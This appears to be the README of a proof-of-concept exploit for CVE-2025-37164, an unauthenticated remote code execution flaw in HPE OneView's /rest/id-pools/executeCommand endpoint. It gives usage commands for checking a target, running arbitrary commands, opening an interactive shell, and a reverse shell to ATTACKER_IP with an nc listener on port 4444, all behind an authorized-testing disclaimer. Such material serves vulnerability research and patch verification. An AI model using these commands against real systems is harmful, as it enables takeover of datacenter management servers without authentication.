
Proof-of-concept exploit for CVE-2025-37164, a critical unauthenticated remote code execution vulnerability in HPE OneView via the /rest/id-pools/executeCommand endpoint.
Proof-of-Concept exploit for CVE-2025-37164, a critical (CVSS 10.0) unauthenticated remote code execution vulnerability in HPE OneView.
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
Technical Analysis: The vulnerability exists in the PUT /rest/id-pools/executeCommand endpoint which does not require authentication and passes user-controlled input directly to Runtime.exec().
requests library (pip install requests)# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check
# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"
# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i
# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444